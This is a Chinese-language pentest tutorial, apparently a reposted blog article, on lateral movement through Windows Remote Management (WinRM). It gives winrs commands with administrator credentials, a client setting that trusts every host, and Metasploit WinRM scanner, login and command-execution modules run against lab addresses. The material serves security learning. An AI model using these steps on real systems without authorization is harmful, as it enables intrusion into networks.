横向移动之Windows远程管理(WinRM)

admin 2023年6月5日22:52:51评论25 views字数 2154阅读7分10秒阅读模式

写在前面

   最近在看ATT&CK战术横向移动,收集域内横向移动的用例。发现T1021.006远程服务Windows Remote Management(WinRM),还是盲区没有实践过,打个卡。

横向移动之Windows远程管理(WinRM)

    先说结论:WinRM优点是在已经掌握psexec、wmiexec等横向工具以后,WinRM的优势大概是隐蔽性更强,windows自带连接指令不用上传工具。缺点是只能明文登录,原生工具不能PTH(CME等可传,感谢指正)。


目录


0x01 WinRM简介0x02 利用前提0x03 WinRM连接实战0x04 参考

横向移动之Windows远程管理(WinRM)




WinRM简介

WinRM 作为 Windows 操作系统的一部分,是一项允许管理员在系统上远程执行管理任务的服务。并且,WinRM 默认情况下支持 Kerberos 和 NTLM 身份验证以及基本身份验证,初始身份验证后,WinRM 会话将使用 AES 加密保护。使用 WinRM 服务需要拥有管理员级别的权限。

在现代 Windows 系统中,WinRM HTTP 通过 TCP 端口 5985 进行通信,而 HTTPS(TLS)通过 TCP 端口 5986 进行通信。如果所有的机器都是在域环境下,则可以使用默认的 5985 端口,否则的话则通过 5986 端口使用 HTTPS 传输。

使用 WinRM 我们可以在远程主机设置了防火墙的情况下远程管理这台服务器,因为启动 WinRM 服务后,防火墙默认会自动放行 5985 端口。这样的管理服务当然不会被攻击者错过,在内网渗透中,我们可以使用 WinRM 服务进行横向移动,并且使用这种远程连接进行横向移动不容易被察觉到,也不会占用远程连接数。

5985端口开放情况Server2008R2及往上的系统中默认中都开启该服务,从Server2012系统后开始,该WinRM服务便被设置为默认开启。Win7系统中却默认安装此WinRM服务,但是默认为禁用状态,Win8系统和Win10系统也都默认开启WinRM服务。

横向移动之Windows远程管理(WinRM)

利用前提

用户账号密码目标机开启5985(多数默认开启)攻击机开启winrm服务配置


WinRM连接

攻击机:192.168.52.30目标机:192.168.93.30

使用扫描工具探测93.30开放端口,发现开放了5985

……192.168.93.30:445 open192.168.93.30:389 open192.168.93.30:593 open192.168.93.30:636 open192.168.93.30:3269 open192.168.93.30:3268 open192.168.93.30:3389 open192.168.93.30:5985 open192.168.93.30:9389 open

尝试使用windows自带的winrs直接连接管理93.30机器,会报错提示目标机器非已信任主机

winrs -r:http://192.168.93.30:5985 -u:administrator -p:Whoami2021 cmd

横向移动之Windows远程管理(WinRM)

攻击机配置WinRM信任主机,*号表示信任所有主机

winrm set winrm/config/Client @{TrustedHosts="*"}
//如果产生如下报错可使用powershell配置Set-Item WSMan:localhostclienttrustedhosts -value *

横向移动之Windows远程管理(WinRM)

横向移动之Windows远程管理(WinRM)

配置后即可尝试连接,直接获取命令行

winrs -r:http://192.168.93.30:5985 -u:administrator -p:Whoami2021 cmd

横向移动之Windows远程管理(WinRM)

MSF利用

//探测use auxiliary/scanner/winrm/winrm_auth_methodsset DOMAIN whoamianonyset rhosts 192.168.93.30run

横向移动之Windows远程管理(WinRM)

//获得的管理员凭据是否对其他系统有效use auxiliary/scanner/winrm/winrm_loginset DOMAIN whoamianonyset USERNAME administratorset PASSWORD Whoami2021set rhosts 192.168.93.30set rport 5985run

横向移动之Windows远程管理(WinRM)

//命令执行,我的建议是跳过前两步直接试试cmduse auxiliary/scanner/winrm/winrm_cmdset rhosts 192.168.93.30set DOMAIN whoamianonyset USERNAME administratorset PASSWORD Whoami2021set CMD ipconfigrun

横向移动之Windows远程管理(WinRM)

参考

https://attack.mitre.org/techniques/T1021/006/http://www.hackdig.com/09/hack-480847.htm


写在最后

     本人坚决反对利用文章内容进行恶意攻击行为,一切错误行为必将受到惩罚,绿色网络需要靠我们共同维护,推荐大家在了解技术原理的前提下,更好的维护个人信息安全、企业安全、国家安全。

    未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。

原文始发于微信公众号(云下信安):横向移动之Windows远程管理(WinRM)

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年6月5日22:52:51
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   横向移动之Windows远程管理(WinRM)http://cn-sec.com/archives/1749067.html

发表评论

匿名网友 填写信息